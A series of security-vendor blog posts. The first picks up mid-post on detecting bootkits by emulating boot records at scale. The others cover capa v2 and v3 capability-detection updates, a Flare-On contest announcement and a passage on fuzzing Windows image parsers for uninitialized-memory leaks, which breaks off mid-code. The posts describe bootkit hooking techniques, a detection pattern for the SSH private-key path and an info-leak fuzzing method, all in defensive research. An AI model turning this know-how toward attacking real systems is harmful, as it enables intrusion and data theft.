
BIOS Boots What? Finding Evil in Boot Code at Scale!

8 August 2018 at 14:45

The second issue is that reverse engineering all boot records is impractical. Given the job of determining if a single system is infected with a bootkit, a malware analyst could acquire a disk image and then reverse engineer the boot bytes to determine if anything malicious is present in the boot chain. However, this process takes time, and even an army of skilled reverse engineers wouldn’t scale to the size of modern enterprise networks. To put this in context, the compromised enterprise network referenced in our ROCKBOOT blog post had approximately 10,000 hosts. Assuming a minimum of two boot records per host, a Master Boot Record (MBR) and a Volume Boot Record (VBR), that is at least 20,000 boot records to analyze! An initial reaction is probably, “Why not just hash the boot records and only analyze the unique ones?” One would assume that corporate networks are mostly homogeneous, particularly with respect to boot code, yet this is not the case. Using the same network as an example, the 20,000 boot records reduced to only approximately 6,000 unique records based on MD5 hash. Table 1 demonstrates this using data we’ve collected across our engagements for various enterprise sizes.

Enterprise Size (# hosts) | Avg # Unique Boot Records (MD5)
100-1000                  | 428
1000-10000                | 4,738
10000+                    | 8,717

Table 1 – Unique boot records by MD5 hash

Now, the next thought might be, “Rather than hashing the entire record, why not implement a custom hashing technique where only subsections of the boot code are hashed, thus avoiding the dynamic data portions?” We tried this as well. For example, in the case of Master Boot Records, we used the bytes in the following two offset ranges to calculate a hash:

md5( offset[0:218] + offset[224:440] )

In one network this resulted in approximately 185,000 systems reducing to around 90 unique MBR hashes. However, this technique had drawbacks. Most notably, it required accounting for numerous special cases for applications such as Altiris, SafeBoot, and PGPGuard. This required small adjustments to the algorithm for each environment, which in turn required reverse engineering many records to find the appropriate offsets to hash.
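
For illustration, here is a minimal Python sketch of the subsection-hashing approach described above; the interpretation of the skipped ranges as dynamic, per-machine data is our annotation:

import hashlib

def mbr_subsection_hash(mbr: bytes) -> str:
    # Hash only the static code portions of a 512-byte MBR.
    assert len(mbr) == 512
    # Skipped: bytes 218-223 (OS-written timestamp/flag area) and bytes
    # 440-511 (disk signature, partition table, 0x55AA boot signature),
    # which vary from machine to machine.
    return hashlib.md5(mbr[0:218] + mbr[224:440]).hexdigest()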

Ultimately, we concluded that to solve the problem we needed a solution that provided the following:

  • A reliable collection of boot records from systems
  • A behavioral analysis of boot records, not just static analysis
  • The ability to analyze tens of thousands of boot records in a timely manner

The remainder of this post describes how we solved each of these challenges.

Collect the Bytes

Malicious drivers insert themselves into the disk driver stack so they can intercept disk I/O as it traverses the stack. They do this to hide their presence (the real bytes) on disk. To address this attack vector, we developed a custom kernel driver (henceforth, our “Raw Read” driver) capable of targeting various altitudes in the disk driver stack. Using the Raw Read driver, we identify the lowest level of the stack and read the bytes from that level (Figure 1).


Figure 1: Malicious driver inserts itself as a filter driver in the stack, raw read driver reads bytes from lowest level

This allows us to bypass the rest of the driver stack, as well as any user space hooks. (It is important to note, however, that if the lowest driver on the I/O stack has an inline code hook an attacker can still intercept the read requests.) Additionally, we can compare the bytes read from the lowest level of the driver stack to those read from user space. Introducing our first indicator of a compromised boot system: the bytes retrieved from user space don’t match those retrieved from the lowest level of the disk driver stack.

Analyze the Bytes

As previously mentioned, reverse engineering and static analysis are impractical when dealing with hundreds of thousands of boot records. Automated dynamic analysis is a more practical approach, specifically through emulating the execution of a boot record. In more technical terms, we are emulating the real mode instructions of a boot record.

The emulation engine that we chose is the Unicorn project. Unicorn is based on the QEMU emulator and supports 16-bit real mode emulation. As boot samples are collected from endpoint machines, they are sent to the emulation engine where high-level functionality is captured during emulation. This functionality includes events such as memory access, disk reads and writes, and other interrupts that execute during emulation.
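
As a rough sketch (not the production engine), capturing such interrupt events with Unicorn’s Python bindings might look like the following; the event representation and register choice are our own assumptions:

from unicorn import Uc, UC_ARCH_X86, UC_MODE_16, UC_HOOK_INTR
from unicorn.x86_const import UC_X86_REG_AH

events = []  # high-level events observed during emulation

def on_interrupt(uc, intno, user_data):
    # int 13h is the BIOS disk service; AH selects the function
    # (e.g., 0x02 = read sectors, 0x03 = write sectors).
    if intno == 0x13:
        events.append(("disk_io", uc.reg_read(UC_X86_REG_AH)))
    else:
        events.append(("interrupt", intno))

emu = Uc(UC_ARCH_X86, UC_MODE_16)
emu.mem_map(0, 1024 * 1024)  # 1 MiB of real-mode address space
emu.hook_add(UC_HOOK_INTR, on_interrupt)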

The Execution Hash

Folding down (aka stacking) duplicate samples is critical to reducing the time a human analyst must spend on follow-up analysis. An interesting quality of the boot samples gathered at scale is that while samples are often functionally identical, the data they use (e.g., strings or offsets) is often very different. This makes it quite difficult to generate a hash to identify duplicates, as demonstrated in Table 1. So how can we solve this problem with emulation? Enter the “execution hash”. The idea is simple: during emulation, hash the mnemonic of every assembly instruction that executes (e.g., “md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this concept of hashing each assembly instruction as it executes to ultimately arrive at the “execution hash”.


Figure 2: Execution hash
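
A minimal sketch of how such an execution hash could be computed with Unicorn and Capstone follows; the load address, instruction cap, and error handling are illustrative assumptions rather than details of the production system:

import hashlib

from capstone import Cs, CS_ARCH_X86, CS_MODE_16
from unicorn import Uc, UcError, UC_ARCH_X86, UC_MODE_16, UC_HOOK_CODE

BOOT_LOAD_ADDR = 0x7C00  # the BIOS loads the first sector here by convention

def execution_hash(boot_record: bytes, max_insns: int = 50000) -> str:
    # Emulate the record in 16-bit real mode, hashing only the mnemonic of
    # every instruction that actually executes (operands are ignored).
    emu = Uc(UC_ARCH_X86, UC_MODE_16)
    dis = Cs(CS_ARCH_X86, CS_MODE_16)
    md5 = hashlib.md5()
    executed = [0]

    emu.mem_map(0, 1024 * 1024)               # 1 MiB of real-mode memory
    emu.mem_write(BOOT_LOAD_ADDR, boot_record)

    def on_code(uc, address, size, user_data):
        for insn in dis.disasm(bytes(uc.mem_read(address, size)), address):
            md5.update(insn.mnemonic.encode())
        executed[0] += 1
        if executed[0] >= max_insns:          # bail out of infinite loops
            uc.emu_stop()

    emu.hook_add(UC_HOOK_CODE, on_code)
    try:
        emu.emu_start(BOOT_LOAD_ADDR, BOOT_LOAD_ADDR + len(boot_record))
    except UcError:
        pass  # malformed records may fault; hash whatever executed
    return md5.hexdigest()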

Using this method, the 650,000 unique boot samples we’ve collected to date can be grouped into a little more than 300 unique execution hashes. This reduced data set makes it far more manageable to identify samples for follow-up analysis. Introducing our second indicator of a compromised boot system: an execution hash that is only found on a few systems in an enterprise!

Behavioral Analysis

Like all malware, suspicious activity executed by bootkits can vary widely. To avoid the pitfall of writing detection signatures for individual malware samples, we focused on identifying behavior that deviates from normal OS bootstrapping. To enable this analysis, the series of instructions that execute during emulation are fed into an analytic engine. Let's look in more detail at an example of malicious functionality exhibited by several bootkits that we discovered by analyzing the results of emulation.

Several malicious bootkits we discovered hooked the interrupt vector table (IVT) and the BIOS Data Area (BDA) to intercept system interrupts and data during the boot process. This can provide an attacker the ability to intercept disk reads and also alter the maximum memory reported by the system. By hooking these structures, bootkits can attempt to hide themselves on disk or even in memory.

These hooks can be identified by memory writes to the memory ranges reserved for the IVT and BDA during the boot process. The IVT structure is located at the memory range 0000:0000h to 0000:03FCh and the BDA is located at 0040:0000h. The malware can hook the interrupt 13h handler to inspect and modify disk writes that occur during the boot process. Additionally, bootkit malware has been observed modifying the memory size reported by the BIOS Data Area in order to potentially hide itself in memory.
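
Concretely, such writes can be flagged with a memory-write hook during emulation. The following is a simplified sketch using Unicorn’s Python bindings, not the actual analytic engine:

from unicorn import Uc, UC_ARCH_X86, UC_MODE_16, UC_HOOK_MEM_WRITE

IVT_START, IVT_END = 0x0000, 0x03FF  # 256 vectors * 4 bytes each
BDA_START, BDA_END = 0x0400, 0x04FF  # BIOS Data Area (segment 0040h)

def on_mem_write(uc, access, address, size, value, user_data):
    if IVT_START <= address <= IVT_END:
        # e.g., a write to 0x4C (4 * 0x13) re-points the int 13h handler
        print(f"suspicious: IVT entry for int {address // 4:#x} overwritten")
    elif BDA_START <= address <= BDA_END:
        # offset 0x13 of the BDA holds the memory size reported by the BIOS
        print(f"suspicious: BDA modified at offset {address - BDA_START:#x}")

emu = Uc(UC_ARCH_X86, UC_MODE_16)
emu.mem_map(0, 1024 * 1024)
emu.hook_add(UC_HOOK_MEM_WRITE, on_mem_write)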

This leads us to our final category of indicators of a compromised boot system: detection of suspicious behaviors such as IVT hooking, decoding and executing data from disk, suspicious screen output from the boot code, and modifying files or data on disk.

Do it at Scale

Dynamic analysis gives us a drastic improvement when determining the behavior of boot records, but it comes at a cost. Unlike static analysis or hashing, it is orders of magnitude slower. In our cloud analysis environment, the average time to emulate a single record is 4.83 seconds. Using the compromised enterprise network that contained ROCKBOOT as an example (approximately 20,000 boot records), it would take more than 26 hours to dynamically analyze (emulate) the records serially! In order to provide timely results to our analysts we needed to easily scale our analysis throughput relative to the amount of incoming data from our endpoint technologies. To further complicate the problem, boot record analysis tends to happen in batches, for example, when our endpoint technology is first deployed to a new enterprise.

With the advent of serverless cloud computing, we had the opportunity to create an emulation analysis service that scales to meet this demand – all while remaining cost effective. One of the advantages of serverless computing versus traditional cloud instances is that there are no compute costs during inactive periods; the only cost incurred is storage. Even when our cloud solution receives tens of thousands of records at the start of a new customer engagement, it can rapidly scale to meet demand and maintain near real-time detection of malicious bytes.

The cloud infrastructure we selected for our application is Amazon Web Services (AWS). Figure 3 provides an overview of the architecture.


Figure 3: Boot record analysis workflow

Our design currently utilizes:

  • API Gateway to provide a RESTful interface.
  • Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
  • DynamoDB to track progress of processed boot records through the system.
  • S3 to store boot records and emulation reports.

The architecture we created exposes a RESTful API that provides a handful of endpoints. At a high level the workflow is:

  1. Endpoint agents in customer networks automatically collect boot records using FireEye’s custom-developed Raw Read kernel driver (see “Collect the Bytes” earlier) and return the records to FireEye’s Incident Response (IR) server.
  2. The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
  3. The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.

The REST API endpoints are exposed via AWS’s API Gateway, which then proxies the incoming requests to a “submission” Lambda. The submission Lambda validates the incoming data, stores the record (aka boot code) to S3, and then fans out the incoming requests to “analysis” Lambdas.
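
A hypothetical sketch of such a submission Lambda follows; the bucket name, function name, and payload fields are illustrative assumptions, not the actual implementation:

import json

import boto3

s3 = boto3.client("s3")
lam = boto3.client("lambda")

BUCKET = "boot-records"              # hypothetical bucket name
ANALYSIS_FN = "bootrecord-analysis"  # hypothetical analysis Lambda name

def submission_handler(event, context):
    # Validate incoming boot records, persist them to S3, and fan out
    # one asynchronous analysis invocation per record.
    records = json.loads(event["body"])["records"]
    accepted = 0
    for rec in records:
        data = bytes.fromhex(rec["bytes"])
        if len(data) % 512 != 0:  # boot records are sector-sized
            continue
        key = f"records/{rec['md5']}"
        s3.put_object(Bucket=BUCKET, Key=key, Body=data)
        # InvocationType="Event" is an asynchronous invoke: each record is
        # analyzed by its own Lambda instance, giving high parallelism.
        lam.invoke(
            FunctionName=ANALYSIS_FN,
            InvocationType="Event",
            Payload=json.dumps({"s3_key": key}).encode(),
        )
        accepted += 1
    return {"statusCode": 202, "body": json.dumps({"accepted": accepted})}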

The analysis Lambda is where boot record emulation occurs. Because Lambdas are started on demand, this model allows for an incredibly high level of parallelization. AWS provides various settings to control the maximum concurrency for a Lambda function, as well as memory/CPU allocations and more. Once the analysis is complete, a report is generated for the boot record and the report is stored in S3. The reports include the results of emulation and other metadata extracted from the boot record (e.g., ASCII strings).

As described earlier, the IR server periodically polls the AWS REST endpoint until processing is complete, at which time the report is downloaded.

Find More Evil in Big Data

Our workflow for identifying malicious boot records is only effective when we know what malicious indicators to look for, or what execution hashes to blacklist. But what if a new malicious boot record (with a unique hash) evades our existing signatures?

For this problem, we leverage the in-house big data platform that we integrated into FireEye Helix following the acquisition of X15 Software. By loading the results of hundreds of thousands of emulations into X15, our analysts can hunt through the results at scale and identify anomalous behaviors such as unique screen prints, unusual initial jump offsets, or patterns in disk reads or writes.

This analysis at scale helps us identify new and interesting samples to reverse engineer, and ultimately helps us identify new detection signatures that feed back into our analytic engine.

Conclusion

Within weeks of going live we detected previously unknown compromised systems in multiple customer environments. We’ve identified everything from ROCKBOOT and HDRoot! bootkits to the admittedly humorous JackTheRipper, a bootkit that spreads itself via floppy disk (no joke). Our system has collected and processed nearly 650,000 unique records to date and continues to find the evil needles (suspicious and malicious boot records) in very large haystacks.

In summary, by combining advanced endpoint boot record extraction with scalable serverless computing and an automated emulation engine, we can rapidly analyze thousands of records in search of evil. FireEye is now using this solution in both our Managed Defense and Incident Response offerings.

Acknowledgements

Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett contributed to this blog post.

ELFant in the Room – capa v3

15 September 2021 at 13:00

Since our initial public release of capa, incident responders and reverse engineers have used the tool to automatically identify capabilities in Windows executables. With our newest code and ruleset updates, capa v3 also identifies capabilities in Executable and Linkable Format (ELF) files, such as those used on Linux and other Unix-like operating systems. This blog post describes the extended analysis and other improvements. You can download capa v3 standalone binaries from the project’s release page and checkout the source code on GitHub.

ELF File Format Support

capa finds capabilities in programs by parsing executable file formats, disassembling code, and then recognizing features in functions. In versions v1 and v2, capa only understood the PE file format, so its analysis was restricted to Windows programs. Thanks to our colleagues at Intezer, capa now recognizes ELF files! This means you can use the tool to identify behaviors in malware that targets Linux computers. Figure 1 shows a rule that describes techniques to fetch the current user on Linux.


Figure 1: capa rule identifying capabilities on Linux

We’re excited Intezer leverages capa and thrilled they are sharing their improvements with the community. In addition to the code updates, Intezer proposed 36 capa rules to identify various capabilities in ELF files, such as reconnaissance, persistence, and host interaction techniques. Please read Intezer’s blog post for more details.

New Features capa Can Recognize

As we taught capa to recognize ELF files, we also wanted rule authors to tune their rules to find behaviors specific to different operating systems (OS), CPU architectures, and file formats. For example, the APIs exposed by Windows are very different from those found on Linux systems; therefore, rules should clearly designate which pattern to use on Windows versus Linux.

Based on discussions and feedback collected from users and contributors, we've extended capa’s rule format to describe OSes, CPU architectures, and file formats. The rule shown in Figure 2 uses os features to distinguish techniques used to get networking interface information on Windows and Linux. Note that the rule is explicit about which APIs are found on each OS, making it easy for both humans and machines to interpret the matching logic.


Figure 2: capa rule using the os feature to distinguish OS specific features

We’ve also added arch (such as arch: i386 for 32-bit Intel code) and format (such as format: elf for ELF files) features to distinguish between CPU architectures and file formats. To learn more about these and capa’s rule syntax, see the rule format documentation on GitHub.

Unfortunately, rules with these new features are not backwards compatible with older versions of capa. Therefore, you should upgrade your capa installation to take advantage of our enhanced rules.

Substring Features

To make many rules easier to read, we’ve added a convenience feature named substring that acts like a literal string match with implied leading and trailing wildcards. This makes it easier to match file path components, such as /.ssh/id_rsa. Previously, users had to wrap a substring with forward slashes and escape special characters with backslashes, leading to nearly incomprehensible character sequences. Now, a substring feature clearly describes a literal string found as part of a longer string. Figure 3 shows how much easier it is to read a substring feature.


Figure 3: Old- and new-style ways of describing a substring
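
In Python terms (our analogy, not capa’s implementation), the new feature behaves like a plain substring test instead of a hand-written regular expression:

import re

path = "/home/user/.ssh/id_rsa"

# old style: a regex wrapped in slashes with escapes and explicit wildcards
old_match = re.search(r".*/\.ssh/id_rsa.*", path) is not None
# new substring feature: a literal match with implied wildcards on both ends
new_match = "/.ssh/id_rsa" in path

assert old_match == new_match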

Figure 4 shows a capa rule using a substring feature to describe a persistence location on Linux.


Figure 4: capa rule using the substring feature to identify persistence on Linux systems

Conclusion

The newest improvements add ELF file analysis support to capa and make its rules even more expressive. We thank the community and notably Intezer for their continued support. We love the collaboration and are excited for future opportunities. The v3 capa release also includes bug fixes, improvements to the IDAPython plugin capa explorer, and more than 50 new rules. See the capa changelog for all update details.

The new capa release is available on the release page and on PyPI. capa’s code and rules are available on GitHub. If you have any questions or feedback, please open an issue or discussion in the respective repository.

Announcing the Eighth Annual Flare-On Challenge

12 August 2021 at 15:30

The FLARE team is once again hosting its annual Flare-On challenge, now in its eighth year. Take this opportunity to enjoy some extreme social distancing by solving fun puzzles to test your mettle and learn new tricks on your path to reverse engineering excellence. The contest will begin at 8:00 p.m. ET on Sept. 10, 2021. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts, and security professionals. The contest runs for six full weeks and ends at 8:00 p.m. ET on Oct. 22, 2021.

This year’s contest will consist of 10 challenges and feature a variety of platforms and formats, including Windows, Linux, and JavaScript. This is one of the only Windows-centric CTF contests out there, and we have crafted it to represent the skills and challenges our FLARE team faces.

If you smash your way through all 10 challenges, you will receive a prize and permanent recognition on the Flare-On website to honor your greatness. Prize details will be revealed later, but as always, it will be worthwhile swag to earn the envy of your peers. Prior years’ prizes were belt buckles, a replica police badge, a challenge coin, a medal, a massive pin, and a cyber-styled skeleton key.

Check the Flare-On website for a live countdown timer, to view the previous year’s winners, and to download past challenges and solutions for practice. For official news and information, we will be using the Twitter hashtag: #flareon8.

capa 2.0: Better, Faster, Stronger

19 July 2021 at 18:00

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven’t heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project’s release page and checkout the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

  • New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
  • More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
  • Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
  • Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.


Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.


Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.


Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.


Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process, but also eliminates the need to context switch between IDA Pro and your favorite text editor, allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.


Figure 5: capa v1.6 results without library code recognition


Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.
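
To illustrate the core idea with a toy sketch (this is neither Hex-Rays’ signature format nor our Rust engine): a FLIRT-style pattern is essentially a masked byte sequence in which relocated or otherwise variant bytes are wildcarded, matched against the first bytes of a function:

def flirt_like_match(pattern, code: bytes) -> bool:
    # pattern: list of (byte, is_wildcard) pairs covering the function start
    if len(code) < len(pattern):
        return False
    return all(wild or b == c for (b, wild), c in zip(pattern, code))

# push ebp; mov ebp, esp; call <rel32>, where the call target byte is
# relocation-dependent and therefore wildcarded
pattern = [(0x55, False), (0x8B, False), (0xEC, False), (0xE8, False), (0x00, True)]
print(flirt_like_match(pattern, b"\x55\x8B\xEC\xE8\x12"))  # True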

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.


Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But when we ran them against our testbed, the rule matched most modern programs because this instruction is often legitimately used in highly optimized routines, such as memcpy, to opt in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won’t flag the embedded cpuid instruction, as it’s not part of the programmer’s code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license), we have spent significant time creating a comprehensive FLIRT signature set for the common malware analysis use case. The signatures come included with capa and are also available in our GitHub repository under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we’ve incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

  • From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
    • C and C++ run-time libraries
    • Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
  • The following open-source projects as compiled with VS2015, VS2017, and VS2019:
    • CryptoPP
    • curl
    • Microsoft Detours
    • Mbed TLS (previously PolarSSL)
    • OpenSSL
    • zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpkg and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

  • Host Interaction describes program functionality to interact with the file system, processes, and the registry
  • Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
  • Collection describes functionality used to steal data such as credentials or credit card information
  • Data Manipulation describes capabilities to encrypt, decrypt, and hash data
  • Communication describes data transfer techniques such as HTTP, DNS, and TCP


Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.

Conclusion

Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification, capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality, while the improved capa explorer plugin helps you focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPi use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

Fuzzing Image Parsing in Windows, Part Two: Uninitialized Memory

3 March 2021 at 19:30

Continuing our discussion of image parsing vulnerabilities in Windows, we take a look at a comparatively less popular vulnerability class: uninitialized memory. In this post, we will look at Windows’ inbuilt image parsers—specifically for vulnerabilities involving the use of uninitialized memory.

The Vulnerability: Uninitialized Memory

In unmanaged languages, such as C or C++, variables are not initialized by default. Using uninitialized variables causes undefined behavior and may cause a crash. There are roughly two variants of uninitialized memory:

  • Direct uninitialized memory usage: An uninitialized pointer or an index is used in read or write. This may cause a crash.
  • Information leakage (info leak) through usage of uninitialized memory: Uninitialized memory content is accessible across a security boundary. An example: an uninitialized kernel buffer accessible from user mode, leading to information disclosure.

In this post we will be looking closely at the second variant in Windows image parsers, which can lead to information disclosure in contexts such as web browsers, where an attacker can read the decoded image back using JavaScript.

Detecting Uninitialized Memory Vulnerabilities

Compared to memory corruption vulnerabilities such as heap overflows and use-after-frees, uninitialized memory vulnerabilities on their own do not access memory out of bounds or out of scope. This makes detecting them slightly more complicated than detecting memory corruption. While direct uninitialized memory usage can cause a crash and can be detected that way, information leakage doesn’t usually cause any crashes. Detecting it requires compiler instrumentations such as MemorySanitizer or binary instrumentation/recompilation tools such as Valgrind.

Detour: Detecting Uninitialized Memory in Linux

Let's take a little detour and look at detecting uninitialized memory in Linux, and compare it with Windows’ built-in capabilities. Even though compilers warn about some uninitialized variables, most of the complicated cases of uninitialized memory usage are not detected at compile time. For this, we can use a run-time detection mechanism. MemorySanitizer is a compiler instrumentation for both GCC and Clang, which detects uninitialized memory reads. A sample of how it works is given in Figure 1.

$ cat sample.cc
#include <stdio.h>

int main()
{
    int *arr = new int[10];
    if(arr[3] == 0)
    {
         printf("Yay!\n");
    }
    printf("%08x\n", arr[3]);
    return 0;
}

$ clang++ -fsanitize=memory -fno-omit-frame-pointer -g sample.cc

$ ./a.out
==29745==WARNING: MemorySanitizer: use-of-uninitialized-value
    #0 0x496db8  (/home/dan/uni/a.out+0x496db8)
    #1 0x7f463c5f1bf6  (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #2 0x41ad69  (/home/dan/uni/a.out+0x41ad69)

SUMMARY: MemorySanitizer: use-of-uninitialized-value (/home/dan/uni/a.out+0x496db8)
Exiting

Figure 1: MemorySanitizer detection of uninitialized memory

Similarly, Valgrind can also be used to detect uninitialized memory during run-time.

Detecting Uninitialized Memory in Windows

Compared to Linux, Windows lacks any built-in mechanism for detecting uninitialized memory usage. While Visual Studio and Clang-cl recently introduced AddressSanitizer support, MemorySanitizer and other sanitizers are not implemented as of this writing.

Some Windows tools that are useful for detecting memory corruption vulnerabilities, such as PageHeap, do not help in detecting uninitialized memory. On the contrary, PageHeap fills memory allocations with patterns, which essentially makes them initialized.

There are a few third-party tools, including Dr. Memory, that use binary instrumentation to detect memory safety issues such as heap overflows, uninitialized memory usage, use-after-frees, and others.

Detecting Uninitialized Memory in Image Decoding

Detecting uninitialized memory in Windows usually requires binary instrumentation, especially when we do not have access to source code. One of the indicators we can use to detect uninitialized memory usage, specifically in the case of image decoding, is the resulting pixels after the image is decoded.

When an image is decoded, it results in a set of raw pixels. If image decoding uses any uninitialized memory, some or all of the pixels may end up random. In simpler words, decoding the same image multiple times may produce different output each time if uninitialized memory is used. This difference in output can be used to detect uninitialized memory and aids in writing a fuzzing harness targeting Windows image decoders. An example fuzzing harness is presented in Figure 2.

#define ROUNDS 20

unsigned char* DecodeImage(char *imagePath)
{
      unsigned char *pixels = NULL;     

      // use GDI or WIC to decode image and get the resulting pixels
      ...
      ...     

      return pixels;
}

void Fuzz(char *imagePath)
{
      unsigned char *refPixels = DecodeImage(imagePath);     

      if(refPixels != NULL)
      {
